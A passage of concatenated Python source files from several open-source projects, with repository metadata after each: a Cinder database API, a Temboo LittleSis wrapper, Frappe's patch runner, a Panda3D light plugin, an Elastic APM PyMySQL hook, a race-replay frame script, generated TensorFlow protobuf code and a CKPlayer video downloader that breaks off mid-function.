return IMPL.backup_get(context, backup_id)
def backup_get_all(context, filters=None):
"""Get all backups."""
return IMPL.backup_get_all(context, filters=filters)
def backup_get_all_by_host(context, host):
"""Get all backups belonging to a host."""
return IMPL.backup_get_all_by_host(context, host)
def backup_create(context, values):
"""Create a backup from the values dictionary."""
return IMPL.backup_create(context, values)
def backup_get_all_by_project(context, project_id, filters=None):
"""Get all backups belonging to a project."""
return IMPL.backup_get_all_by_project(context, project_id,
filters=filters)
def backup_get_all_by_volume(context, volume_id, filters=None):
"""Get all backups belonging to a volume."""
return IMPL.backup_get_all_by_volume(context, volume_id,
filters=filters)
def backup_update(context, backup_id, values):
"""Set the given properties on a backup and update it.
Raises NotFound if backup does not exist.
"""
return IMPL.backup_update(context, backup_id, values)
def backup_destroy(context, backup_id):
"""Destroy the backup or raise if it does not exist."""
return IMPL.backup_destroy(context, backup_id)
###################
def transfer_get(context, transfer_id):
"""Get a volume transfer record or raise if it does not exist."""
return IMPL.transfer_get(context, transfer_id)
def transfer_get_all(context):
"""Get all volume transfer records."""
return IMPL.transfer_get_all(context)
def transfer_get_all_by_project(context, project_id):
"""Get all volume transfer records for specified project."""
return IMPL.transfer_get_all_by_project(context, project_id)
def transfer_create(context, values):
"""Create an entry in the transfers table."""
return IMPL.transfer_create(context, values)
def transfer_destroy(context, transfer_id):
"""Destroy a record in the volume transfer table."""
return IMPL.transfer_destroy(context, transfer_id)
def transfer_accept(context, transfer_id, user_id, project_id):
"""Accept a volume transfer."""
return IMPL.transfer_accept(context, transfer_id, user_id, project_id)
###################
def consistencygroup_get(context, consistencygroup_id):
"""Get a consistencygroup or raise if it does not exist."""
return IMPL.consistencygroup_get(context, consistencygroup_id)
def consistencygroup_get_all(context):
"""Get all consistencygroups."""
return IMPL.consistencygroup_get_all(context)
def consistencygroup_create(context, values):
"""Create a consistencygroup from the values dictionary."""
return IMPL.consistencygroup_create(context, values)
def consistencygroup_get_all_by_project(context, project_id):
"""Get all consistencygroups belonging to a project."""
return IMPL.consistencygroup_get_all_by_project(context, project_id)
def consistencygroup_update(context, consistencygroup_id, values):
"""Set the given properties on a consistencygroup and update it.
Raises NotFound if consistencygroup does not exist.
"""
return IMPL.consistencygroup_update(context, consistencygroup_id, values)
def consistencygroup_destroy(context, consistencygroup_id):
"""Destroy the consistencygroup or raise if it does not exist."""
return IMPL.consistencygroup_destroy(context, consistencygroup_id)
###################
def cgsnapshot_get(context, cgsnapshot_id):
"""Get a cgsnapshot or raise if it does not exist."""
return IMPL.cgsnapshot_get(context, cgsnapshot_id)
def cgsnapshot_get_all(context):
"""Get all cgsnapshots."""
return IMPL.cgsnapshot_get_all(context)
def cgsnapshot_create(context, values):
"""Create a cgsnapshot from the values dictionary."""
return IMPL.cgsnapshot_create(context, values)
def cgsnapshot_get_all_by_group(context, group_id):
"""Get all cgsnapshots belonging to a consistency group."""
return IMPL.cgsnapshot_get_all_by_group(context, group_id)
def cgsnapshot_get_all_by_project(context, project_id):
"""Get all cgsnapshots belonging to a project."""
return IMPL.cgsnapshot_get_all_by_project(context, project_id)
def cgsnapshot_update(context, cgsnapshot_id, values):
"""Set the given properties on a cgsnapshot and update it.
Raises NotFound if cgsnapshot does not exist.
"""
return IMPL.cgsnapshot_update(context, cgsnapshot_id, values)
def cgsnapshot_destroy(context, cgsnapshot_id):
"""Destroy the cgsnapshot or raise if it does not exist."""
return IMPL.cgsnapshot_destroy(context, cgsnapshot_id)
def purge_deleted_rows(context, age_in_days):
"""Purge deleted rows older than given age from cinder tables
Raises InvalidParameterValue if age_in_days is incorrect.
:returns: number of deleted rows
"""
return IMPL.purge_deleted_rows(context, age_in_days=age_in_days)
###################
def driver_initiator_data_update(context, initiator, namespace, updates):
"""Create DriverPrivateData from the values dictionary."""
return IMPL.driver_initiator_data_update(context, initiator,
namespace, updates)
def driver_initiator_data_get(context, initiator, namespace):
    """Query for a DriverPrivateData record with the specified key."""
    return IMPL.driver_initiator_data_get(context, initiator, namespace)
| {
"content_hash": "7bdab67aa5deb0e8484d43a58c2369e6",
"timestamp": "",
"source": "github",
"line_count": 967,
"max_line_length": 79,
"avg_line_length": 33.153050672182005,
"alnum_prop": 0.6721357497114695,
"repo_name": "yanheven/cinder",
"id": "f0726fea9d360c18d3ef7c8241e125e20f7b01ec",
"size": "32853",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cinder/db/api.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "PLpgSQL",
"bytes": "2511"
},
{
"name": "Python",
"bytes": "10655225"
},
{
"name": "Shell",
"bytes": "8111"
}
],
"symlink_target": ""
} |
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class GetListsByEntity(Choreography):

    # Generated Temboo Choreo wrapper for the LittleSis
    # /Library/LittleSis/Entity/GetListsByEntity endpoint.

    def __init__(self, temboo_session):
        """
        Create a new instance of the GetListsByEntity Choreo. A TembooSession object, containing a valid
        set of Temboo credentials, must be supplied.
        """
        super(GetListsByEntity, self).__init__(temboo_session, '/Library/LittleSis/Entity/GetListsByEntity')

    def new_input_set(self):
        # Return an empty input set for this Choreo.
        return GetListsByEntityInputSet()

    def _make_result_set(self, result, path):
        # Wrap a raw execution result in the matching ResultSet.
        return GetListsByEntityResultSet(result, path)

    def _make_execution(self, session, exec_id, path):
        # Wrap an in-flight execution in the matching execution handle.
        return GetListsByEntityChoreographyExecution(session, exec_id, path)
class GetListsByEntityInputSet(InputSet):
    """
    An InputSet with methods appropriate for specifying the inputs to the GetListsByEntity
    Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
    """
    def set_APIKey(self, value):
        """
        Set the value of the APIKey input for this Choreo. ((required, string) The API Key obtained from LittleSis.org.)
        """
        super(GetListsByEntityInputSet, self)._set_input('APIKey', value)

    def set_EntityID(self, value):
        """
        Set the value of the EntityID input for this Choreo. ((required, integer) The ID of the record to be returned.)
        """
        super(GetListsByEntityInputSet, self)._set_input('EntityID', value)

    def set_ResponseFormat(self, value):
        """
        Set the value of the ResponseFormat input for this Choreo. ((optional, string) Format of the response returned by LittleSis.org. Acceptable inputs: xml or json. Defaults to xml)
        """
        super(GetListsByEntityInputSet, self)._set_input('ResponseFormat', value)
class GetListsByEntityResultSet(ResultSet):
    """
    A ResultSet with methods tailored to the values returned by the GetListsByEntity Choreo.
    The ResultSet object is used to retrieve the results of a Choreo execution.
    """
    def getJSONFromString(self, str):
        # NOTE(review): the parameter name shadows the builtin `str`;
        # kept as-is because renaming would change the visible signature.
        return json.loads(str)

    def get_Response(self):
        """
        Retrieve the value for the "Response" output from this Choreo execution. (The response from LittleSis.org.)
        """
        return self._output.get('Response', None)
class GetListsByEntityChoreographyExecution(ChoreographyExecution):

    def _make_result_set(self, response, path):
        # Wrap the raw response in this Choreo's ResultSet type.
        return GetListsByEntityResultSet(response, path)
| {
"content_hash": "149be0c12e4483cd6f67de1a9ff52e8a",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 185,
"avg_line_length": 40.57575757575758,
"alnum_prop": 0.7064973861090366,
"repo_name": "jordanemedlock/psychtruths",
"id": "a8066ea73741784c3528331d87c1c0f8be9f919a",
"size": "3592",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "temboo/core/Library/LittleSis/Entity/GetListsByEntity.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "18544"
},
{
"name": "HTML",
"bytes": "34650"
},
{
"name": "JavaScript",
"bytes": "423"
},
{
"name": "PHP",
"bytes": "1097"
},
{
"name": "Python",
"bytes": "23444578"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals, print_function
"""
Execute Patch Files
To run directly
python lib/wnf.py patch patch1, patch2 etc
python lib/wnf.py patch -f patch1, patch2 etc
where patch1, patch2 is module name
"""
import frappe, frappe.permissions, time
# for patches
import os
class PatchError(Exception):
	"""Raised when a patch fails to execute and the patch run must stop."""
	pass
def run_all(skip_failing=False):
	"""Run every pending patch from each installed app's patches.txt.

	Patches already recorded in `tabPatch Log` are skipped.  Patches
	prefixed with "finally:" are collected by execute_patch and run
	after all others, with the prefix stripped.

	:param skip_failing: when True, log and continue past a failing
		patch instead of aborting the whole run.
	"""
	already_run = set(row[0] for row in frappe.db.sql("""select patch from `tabPatch Log`"""))

	frappe.flags.final_patches = []

	def execute_one(patch):
		try:
			if not run_single(patchmodule=patch):
				log(patch + ': failed: STOPPED')
				raise PatchError(patch)
		except Exception:
			if skip_failing:
				log('Failed to execute patch')
			else:
				raise

	for patch in get_all_patches():
		if patch and patch not in already_run:
			execute_one(patch)

	# deferred "finally:" patches run last, without their prefix
	for patch in frappe.flags.final_patches:
		execute_one(patch.replace('finally:', ''))
def get_all_patches():
	"""Collect patch entries from patches.txt of every installed app.

	The legacy "webnotes" app name is mapped to "frappe" (3-to-4 rename)
	and the "shopping_cart" app is skipped entirely.
	"""
	rename = {"webnotes": "frappe"}
	entries = []
	for app in frappe.get_installed_apps():
		if app == "shopping_cart":
			continue
		app = rename.get(app, app)
		entries.extend(frappe.get_file_items(frappe.get_pymodule_path(app, "patches.txt")))
	return entries
def reload_doc(args):
	"""Reload a DocType definition through the patch runner so it is logged."""
	import frappe.modules
	run_single(method=frappe.modules.reload_doc, methodargs=args)
def run_single(patchmodule=None, method=None, methodargs=None, force=False):
	"""Run one patch (or call *method*) unless it was already executed.

	Returns True on success, or immediately when the patch is already
	recorded in the Patch Log and neither *force* nor *method* is given.
	"""
	from frappe import conf

	# developer mode would rewrite txt files during reload; disable it
	conf.developer_mode = 0

	if not (force or method) and executed(patchmodule):
		return True
	return execute_patch(patchmodule, method, methodargs)
def execute_patch(patchmodule, method=None, methodargs=None):
	"""execute the patch"""
	# Block all other sessions while the patch runs, and wrap the whole
	# run in a transaction so a failing patch leaves no partial changes.
	block_user(True)
	frappe.db.begin()
	start_time = time.time()
	try:
		log('Executing {patch} in {site} ({db})'.format(patch=patchmodule or str(methodargs),
			site=frappe.local.site, db=frappe.db.cur_db_name))
		if patchmodule:
			if patchmodule.startswith("finally:"):
				# run run patch at the end
				# (deferred: collected here and replayed by run_all after all others)
				frappe.flags.final_patches.append(patchmodule)
			else:
				if patchmodule.startswith("execute:"):
					# inline statement from patches.txt, e.g. "execute:frappe.db.sql(...)"
					exec(patchmodule.split("execute:")[1],globals())
				else:
					# dotted module path; call its execute() entry point
					frappe.get_attr(patchmodule.split()[0] + ".execute")()
				update_patch_log(patchmodule)
		elif method:
			method(**methodargs)
	except Exception:
		frappe.db.rollback()
		# NOTE(review): block_user(True) is never undone on failure, so the
		# "patches are being executed" lock stays set -- confirm intended.
		raise
	else:
		frappe.db.commit()

	end_time = time.time()
	block_user(False)
	log('Success: Done in {time}s'.format(time = round(end_time - start_time, 3)))
	return True
def update_patch_log(patchmodule):
	"""Record *patchmodule* in `tabPatch Log` so it is never re-run."""
	entry = frappe.get_doc({"doctype": "Patch Log", "patch": patchmodule})
	entry.insert(ignore_permissions=True)
def executed(patchmodule):
	"""Return a truthy value if *patchmodule* already has a Patch Log entry."""
	# entries are stored without the "finally:" prefix
	name = patchmodule
	if name.startswith('finally:'):
		name = name.replace('finally:', '')
	return frappe.db.get_value("Patch Log", {"patch": name})
def block_user(block):
	"""Set or clear the global flag that pauses user sessions while patching."""
	frappe.local.flags.in_patch = block
	frappe.db.begin()
	msg = "Patches are being executed in the system. Please try again in a few moments."
	frappe.db.set_global('__session_status', 'stop' if block else None)
	frappe.db.set_global('__session_status_message', msg if block else None)
	frappe.db.commit()
def check_session_stopped():
	"""Raise SessionStopped when patches are currently being executed."""
	status = frappe.db.get_global("__session_status")
	if status == 'stop':
		frappe.msgprint(frappe.db.get_global("__session_status_message"))
		raise frappe.SessionStopped('Session Stopped')
def log(msg):
	"""Write a patch-runner message to stdout."""
	print(msg)
| {
"content_hash": "f3ebdd08704e5414aa74df92619112f1",
"timestamp": "",
"source": "github",
"line_count": 134,
"max_line_length": 95,
"avg_line_length": 27.65671641791045,
"alnum_prop": 0.7031840259039396,
"repo_name": "vjFaLk/frappe",
"id": "b3237b8b76eae4634af959f2da411039828a1da5",
"size": "3807",
"binary": false,
"copies": "1",
"ref": "refs/heads/parsimony-production",
"path": "frappe/modules/patch_handler.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "290337"
},
{
"name": "HTML",
"bytes": "179507"
},
{
"name": "JavaScript",
"bytes": "2179734"
},
{
"name": "Less",
"bytes": "146135"
},
{
"name": "Makefile",
"bytes": "99"
},
{
"name": "Python",
"bytes": "2774237"
},
{
"name": "SCSS",
"bytes": "15721"
},
{
"name": "Shell",
"bytes": "3875"
},
{
"name": "Vue",
"bytes": "95109"
}
],
"symlink_target": ""
} |
from pandac.PandaModules import NodePath
from pandac.PandaModules import VBase4
from pandac.PandaModules import BitMask32
from pandac.PandaModules import DirectionalLight as PDirectionalLight
class DirLight:
    """Creates a simple directional light"""
    def __init__(self,manager,xml):
        # Wrap the Panda3D directional light in a NodePath so it can be
        # positioned and parented; setCompass() keeps its orientation fixed
        # relative to the scene even if its parent rotates.
        self.light = PDirectionalLight('dlight')
        self.lightNode = NodePath(self.light)
        self.lightNode.setCompass()
        # Camera masks are not available in all Panda3D builds; guard with hasattr.
        if hasattr(self.lightNode.node(), "setCameraMask"):
            self.lightNode.node().setCameraMask(BitMask32.bit(3))
        self.reload(manager,xml)

    def reload(self,manager,xml):
        # Re-read all light parameters from the plugin's XML element.
        # Each child element is optional; missing ones fall back to defaults.
        color = xml.find('color')
        if color!=None:
            self.light.setColor(VBase4(float(color.get('r')),
                                       float(color.get('g')),
                                       float(color.get('b')), 1.0))
        pos = xml.find('pos')
        if pos!=None:
            self.lightNode.setPos(float(pos.get('x')),
                                  float(pos.get('y')),
                                  float(pos.get('z')))
        else:
            self.lightNode.setPos(0, 0, 0)
        lookAt = xml.find('lookAt')
        if lookAt!=None:
            self.lightNode.lookAt(float(lookAt.get('x')),
                                  float(lookAt.get('y')),
                                  float(lookAt.get('z')))
        lens = xml.find('lens')
        if lens!=None and hasattr(self.lightNode.node(), 'getLens'):
            # 'auto' parents the light to the camera so shadows follow the
            # view; otherwise the light is fixed in the scene under render.
            # NOTE(review): 'base' and 'render' are Panda3D globals injected
            # by ShowBase -- assumed present at reload time.
            if bool(int(lens.get('auto'))):
                self.lightNode.reparentTo(base.camera)
            else:
                self.lightNode.reparentTo(render)
            lobj = self.lightNode.node().getLens()
            # NOTE(review): XML attributes arrive as strings, so the numeric
            # defaults apply only when the attribute is missing entirely --
            # confirm attributes are always well-formed floats.
            lobj.setNearFar(float(lens.get('near', 1.0)),
                            float(lens.get('far', 100000.0)))
            lobj.setFilmSize(float(lens.get('width', 1.0)),
                             float(lens.get('height', 1.0)))
            lobj.setFilmOffset(float(lens.get('x', 0.0)),
                               float(lens.get('y', 0.0)))
        if hasattr(self.lightNode.node(), 'setShadowCaster'):
            shadows = xml.find('shadows')
            if shadows!=None:
                self.lightNode.node().setShadowCaster(True, int(shadows.get('width', 512)),
                                                      int(shadows.get('height', 512)),
                                                      int(shadows.get('sort', -10)))
                #self.lightNode.node().setPushBias(float(shadows.get('bias', 0.5)))
            else:
                self.lightNode.node().setShadowCaster(False)

    def start(self):
        # Enable this light for the whole scene graph.
        render.setLight(self.lightNode)

    def stop(self):
        # Remove this light from the scene graph.
        render.clearLight(self.lightNode)
| {
"content_hash": "9632483af513ff9955e29b71504c39ea",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 84,
"avg_line_length": 35.5,
"alnum_prop": 0.5661971830985916,
"repo_name": "frainfreeze/FPS-kit",
"id": "d427c817ba807b2dce63d67f9c3e85e7d0e83d7c",
"size": "3098",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "plugins/dirlight/dirlight.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "148345"
},
{
"name": "Shell",
"bytes": "75"
}
],
"symlink_target": ""
} |
from elasticapm.instrumentation.packages.dbapi2 import (
ConnectionProxy,
CursorProxy,
DbApi2Instrumentation,
extract_signature,
)
class PyMySQLCursorProxy(CursorProxy):
    """Cursor proxy used by the pymysql instrumentation."""
    provider_name = "mysql"
    def extract_signature(self, sql):
        # Delegate to the shared dbapi2 SQL-signature parser.
        return extract_signature(sql)
class PyMySQLConnectionProxy(ConnectionProxy):
    """Connection proxy that hands out PyMySQLCursorProxy cursors."""
    cursor_proxy = PyMySQLCursorProxy
class PyMySQLConnectorInstrumentation(DbApi2Instrumentation):
    """Instrument pymysql by wrapping pymysql.connect()."""
    name = "pymysql"
    # (module, attribute) pairs to patch.
    instrument_list = [("pymysql", "connect")]
    def call(self, module, method, wrapped, instance, args, kwargs):
        # Wrap the raw connection so cursors created from it are
        # proxied as well.
        return PyMySQLConnectionProxy(wrapped(*args, **kwargs))
| {
"content_hash": "6c39de00bddc294b59d2b0c100b1ac08",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 68,
"avg_line_length": 24.884615384615383,
"alnum_prop": 0.732612055641422,
"repo_name": "beniwohli/apm-agent-python",
"id": "69b5e91b700133efe3eabe4b41b406d03cd6af7e",
"size": "2239",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "elasticapm/instrumentation/packages/pymysql.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1685"
},
{
"name": "C",
"bytes": "81870"
},
{
"name": "Dockerfile",
"bytes": "1730"
},
{
"name": "Gherkin",
"bytes": "10997"
},
{
"name": "Groovy",
"bytes": "5676"
},
{
"name": "HTML",
"bytes": "560"
},
{
"name": "Makefile",
"bytes": "885"
},
{
"name": "Python",
"bytes": "1660078"
},
{
"name": "Shell",
"bytes": "12434"
}
],
"symlink_target": ""
} |
import json
import sys
import moviepy.editor as mpy
from numpy import cumsum
from replayenhancer.RaceData import RaceData
# Load the JSON config (path given as first CLI argument), then the
# telemetry and the matching video clip.
config = json.load(open(sys.argv[1]))
data = RaceData(config['source_telemetry'])
clip = mpy.VideoFileClip(config['source_video']).subclip(
    config['video_skipstart'], config['video_skipend'])
# Drain the telemetry stream; RaceData signals end-of-data by raising
# StopIteration.
try:
    while True:
        data.get_data()
except StopIteration:
    pass
# Cumulative lap times + sync offset give the video timestamp of each
# lap boundary; save one frame per lap.
# NOTE(review): driver name is hard-coded -- presumably this utility is
# tuned to one particular replay; confirm before reusing it.
times = [time + config['sync_racestart'] for time in list(cumsum(data.drivers['Kobernulf Monnur'].lap_times))]
for lap, time in enumerate(times, 1):
    clip.save_frame("outputs/lap{}.jpg".format(lap), time)
# Sweep the sync offset +/-0.10s in 0.01s steps around sync_racestart to
# help calibrate it visually against the first lap boundary.
for ix in range(10, -11, -1):
    offset = config['sync_racestart'] + ix / 100
    times = [time + offset for time in list(cumsum(data.drivers['Kobernulf Monnur'].lap_times))]
    clip.save_frame("outputs/sync{}.jpg".format(int(offset * 100)), times[0])
| {
"content_hash": "17dae5fdd4a723b6ddc27b87e990108b",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 110,
"avg_line_length": 30.821428571428573,
"alnum_prop": 0.6998841251448435,
"repo_name": "SenorPez/project-cars-replay-enhancer",
"id": "8383e2ddcf18fd2b75fa6ac1ca89fce2c2bdbbbd",
"size": "863",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "utils/lappics.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "434767"
},
{
"name": "Shell",
"bytes": "318"
}
],
"symlink_target": ""
} |
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
# NOTE(review): this module appears to be machine-generated protoc
# output for tensorflow/core/protobuf/debug.proto -- regenerate from
# the .proto file instead of editing these descriptors by hand.
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
  name='tensorflow/core/protobuf/debug.proto',
  package='tensorflow',
  syntax='proto3',
  serialized_pb=_b('\n$tensorflow/core/protobuf/debug.proto\x12\ntensorflow\"\x8e\x01\n\x10\x44\x65\x62ugTensorWatch\x12\x11\n\tnode_name\x18\x01 \x01(\t\x12\x13\n\x0boutput_slot\x18\x02 \x01(\x05\x12\x11\n\tdebug_ops\x18\x03 \x03(\t\x12\x12\n\ndebug_urls\x18\x04 \x03(\t\x12+\n#tolerate_debug_op_creation_failures\x18\x05 \x01(\x08\"b\n\x0c\x44\x65\x62ugOptions\x12=\n\x17\x64\x65\x62ug_tensor_watch_opts\x18\x04 \x03(\x0b\x32\x1c.tensorflow.DebugTensorWatch\x12\x13\n\x0bglobal_step\x18\n \x01(\x03\x42,\n\x18org.tensorflow.frameworkB\x0b\x44\x65\x62ugProtosP\x01\xf8\x01\x01\x62\x06proto3')
)
# Descriptor for the DebugTensorWatch message.
_DEBUGTENSORWATCH = _descriptor.Descriptor(
  name='DebugTensorWatch',
  full_name='tensorflow.DebugTensorWatch',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='node_name', full_name='tensorflow.DebugTensorWatch.node_name', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='output_slot', full_name='tensorflow.DebugTensorWatch.output_slot', index=1,
      number=2, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='debug_ops', full_name='tensorflow.DebugTensorWatch.debug_ops', index=2,
      number=3, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='debug_urls', full_name='tensorflow.DebugTensorWatch.debug_urls', index=3,
      number=4, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='tolerate_debug_op_creation_failures', full_name='tensorflow.DebugTensorWatch.tolerate_debug_op_creation_failures', index=4,
      number=5, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=53,
  serialized_end=195,
)
# Descriptor for the DebugOptions message.
_DEBUGOPTIONS = _descriptor.Descriptor(
  name='DebugOptions',
  full_name='tensorflow.DebugOptions',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='debug_tensor_watch_opts', full_name='tensorflow.DebugOptions.debug_tensor_watch_opts', index=0,
      number=4, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='global_step', full_name='tensorflow.DebugOptions.global_step', index=1,
      number=10, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=197,
  serialized_end=295,
)
# Wire up cross-references and register everything with the symbol db.
_DEBUGOPTIONS.fields_by_name['debug_tensor_watch_opts'].message_type = _DEBUGTENSORWATCH
DESCRIPTOR.message_types_by_name['DebugTensorWatch'] = _DEBUGTENSORWATCH
DESCRIPTOR.message_types_by_name['DebugOptions'] = _DEBUGOPTIONS
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
DebugTensorWatch = _reflection.GeneratedProtocolMessageType('DebugTensorWatch', (_message.Message,), dict(
  DESCRIPTOR = _DEBUGTENSORWATCH,
  __module__ = 'tensorflow.core.protobuf.debug_pb2'
  # @@protoc_insertion_point(class_scope:tensorflow.DebugTensorWatch)
  ))
_sym_db.RegisterMessage(DebugTensorWatch)
DebugOptions = _reflection.GeneratedProtocolMessageType('DebugOptions', (_message.Message,), dict(
  DESCRIPTOR = _DEBUGOPTIONS,
  __module__ = 'tensorflow.core.protobuf.debug_pb2'
  # @@protoc_insertion_point(class_scope:tensorflow.DebugOptions)
  ))
_sym_db.RegisterMessage(DebugOptions)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\030org.tensorflow.frameworkB\013DebugProtosP\001\370\001\001'))
# @@protoc_insertion_point(module_scope)
| {
"content_hash": "1f58100ee97ce799177b5ee36ca1b72f",
"timestamp": "",
"source": "github",
"line_count": 143,
"max_line_length": 593,
"avg_line_length": 38.72027972027972,
"alnum_prop": 0.7200650171573054,
"repo_name": "ryfeus/lambda-packs",
"id": "58cec56bbb21450255b6aaae283df7e05eaeec9d",
"size": "5644",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Tensorflow/source/tensorflow/core/protobuf/debug_pb2.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "9768343"
},
{
"name": "C++",
"bytes": "76566960"
},
{
"name": "CMake",
"bytes": "191097"
},
{
"name": "CSS",
"bytes": "153538"
},
{
"name": "Cuda",
"bytes": "61768"
},
{
"name": "Cython",
"bytes": "3110222"
},
{
"name": "Fortran",
"bytes": "110284"
},
{
"name": "HTML",
"bytes": "248658"
},
{
"name": "JavaScript",
"bytes": "62920"
},
{
"name": "MATLAB",
"bytes": "17384"
},
{
"name": "Makefile",
"bytes": "152150"
},
{
"name": "Python",
"bytes": "549307737"
},
{
"name": "Roff",
"bytes": "26398"
},
{
"name": "SWIG",
"bytes": "142"
},
{
"name": "Shell",
"bytes": "7790"
},
{
"name": "Smarty",
"bytes": "4090"
},
{
"name": "TeX",
"bytes": "152062"
},
{
"name": "XSLT",
"bytes": "305540"
}
],
"symlink_target": ""
} |
__all__ = ['ckplayer_download']
from xml.etree import cElementTree as ET
from copy import copy
from ..common import *
#----------------------------------------------------------------------
def ckplayer_get_info_by_xml(ckinfo):
    """str->dict
    Information for CKPlayer API content."""
    e = ET.XML(ckinfo)
    # Result skeleton; missing XML elements leave these defaults.
    video_dict = {'title': '',
                  #'duration': 0,
                  'links': [],
                  'size': 0,
                  'flashvars': '',}
    # dictify() turns the element tree into nested dicts/lists; children
    # are lists keyed by tag, text lives under '_text'.
    dictified = dictify(e)['ckplayer']
    if 'info' in dictified:
        if '_text' in dictified['info'][0]['title'][0]: #title
            video_dict['title'] = dictified['info'][0]['title'][0]['_text'].strip()
    #if dictify(e)['ckplayer']['info'][0]['title'][0]['_text'].strip(): #duration
        #video_dict['title'] = dictify(e)['ckplayer']['info'][0]['title'][0]['_text'].strip()
    # Total size is summed over every <video> piece when the first piece
    # declares one.
    if '_text' in dictified['video'][0]['size'][0]: #size exists for 1 piece
        video_dict['size'] = sum([int(i['size'][0]['_text']) for i in dictified['video']])
    if '_text' in dictified['video'][0]['file'][0]: #link exist
        video_dict['links'] = [i['file'][0]['_text'].strip() for i in dictified['video']]
    if '_text' in dictified['flashvars'][0]:
        video_dict['flashvars'] = dictified['flashvars'][0]['_text'].strip()
    return video_dict
#----------------------------------------------------------------------
#helper
#https://stackoverflow.com/questions/2148119/how-to-convert-an-xml-string-to-a-dictionary-in-python
def dictify(r, root=True):
    """Convert an ElementTree element into nested dicts/lists.

    The top-level call wraps the result as {tag: ...}.  Attributes become
    plain keys, non-empty text is stored under "_text", and each child
    tag maps to a list of recursively converted children.
    """
    if root:
        return {r.tag: dictify(r, False)}
    result = dict(r.attrib)
    if r.text:
        result["_text"] = r.text
    for child in r.findall("./*"):
        result.setdefault(child.tag, []).append(dictify(child, False))
    return result
#----------------------------------------------------------------------
def ckplayer_download_by_xml(ckinfo, output_dir = '.', merge = False, info_only = False, **kwargs):
    """Report (and unless info_only, download) the media described by a
    CKPlayer info XML document.

    ckinfo  -- XML text returned by the CKPlayer API
    kwargs  -- may carry 'title' to override the XML title
    """
    video_info = ckplayer_get_info_by_xml(ckinfo)
    # Targeted lookup instead of the old bare `except:` around kwargs['title'].
    title = kwargs.get('title', '')
    type_ = ''
    _ext = ''
    size = 0
    if video_info['links']:  #has link
        # Use the first link to determine content type and extension.
        type_, _ext, size = url_info(video_info['links'][0])
        if video_info['size']:
            # The XML declared a total size; trust it.  (The previous
            # test `'size' in video_info` was always true because the
            # key is pre-initialised to 0, which made the summation
            # branch below unreachable.)
            size = int(video_info['size'])
        else:
            # Otherwise accumulate the remaining pieces; the first one
            # was already counted by url_info() above.
            for link in video_info['links'][1:]:
                size += url_info(link)[2]
    print_info(site_info, title, type_, size)
    if not info_only:
        download_urls(video_info['links'], title, _ext, size, output_dir=output_dir, merge=merge)
#----------------------------------------------------------------------
def ckplayer_download(url, output_dir = '.', merge = False, info_only = False, is_xml = True, **kwargs):
    """Download a CKPlayer video given the URL of its info XML.

    kwargs may carry 'title' (display title) and 'headers' (extra HTTP
    request headers for fetching the XML).
    """
    if is_xml: #URL is XML URL
